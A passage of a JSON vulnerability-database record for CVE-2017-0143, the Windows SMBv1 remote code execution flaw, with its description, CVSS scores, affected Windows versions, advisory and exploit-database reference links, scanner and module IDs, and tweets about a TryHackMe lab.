"tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "96706", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96706"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148"}], "immutableFields": []}, {"id": "CVE-2017-0143", "bulletinFamily": "NVD", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "reporter": "secure@microsoft.com", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0143"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 9.2, "vector": "NONE"}, "twitter": {"counter": 57, "modified": "2021-02-02T06:36:30", "tweets": [{"link": "https://twitter.com/Hobbes85ae1/status/1384683091181047808", "text": "Blue - I have just completed this room! Check it out: https://t.co/lqz4GMSKMq?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/jblanko1984/status/1382343441040936960", "text": "Blue - I have just completed this room! Check it out: https://t.co/JR1xhzqLZN?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/dwambia/status/1381683825042931712", "text": "Blue - I have just completed this room! Check it out: https://t.co/6qcJuSTklT?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Cameron16996962/status/1385269426321231876", "text": "Brute It - I have just completed this room! Check it out: https://t.co/P0vO3cuyJm?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/bruteit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/ihoruhe/status/1381730384447213573", "text": "Blue - I have just completed this room! Check it out: https://t.co/0vHkuPlF0m?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/yellephen/status/1373222110034759681", "text": "Blue - I have just completed this room! Check it out: https://t.co/WbveSWg8dJ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/chittomodekinai/status/1376211737238626307", "text": "Blue - I have just completed this room! Check it out: https://t.co/ztz5xEd3UX?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/CoolHandSquid/status/1382098669852372992", "text": "Blue - I have just completed this room! Check it out: https://t.co/zCwRy6GPJf?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/_nabeen/status/1381922890770042887", "text": "\u307e\u3060writeup\u307f\u306a\u3044\u3068\u30c0\u30e1\u306d\n\nBlue - I have just completed this room! Check it out: https://t.co/jAlK4M1Ntn?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/BELKHIRIKhired1/status/1383176994536456201", "text": "Blue - I have just completed this room! Check it out: https://t.co/eoVe5ak68d?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96703", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96703"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "hash": "a9607c104a47576843cea504612b3f6584c0c42097544568f87ff433d6b9e987", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "73402198f736fb284b47cab17ac32650", "key": "description"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d62415554465cb42c2ec8c5b1a727c7d", "key": "extraReferences"}, {"hash": "1b0a551fb9c586414474d37717dc313a", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f11fa97bbd952a3146ffbddd59276c1d", "key": "title"}, {"hash": "2f4290596ecc563b65873431415d8e8a", "key": "references"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "id": "CVE-2017-0143", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0143", "type": "cve", "viewCount": 205}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:29", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": 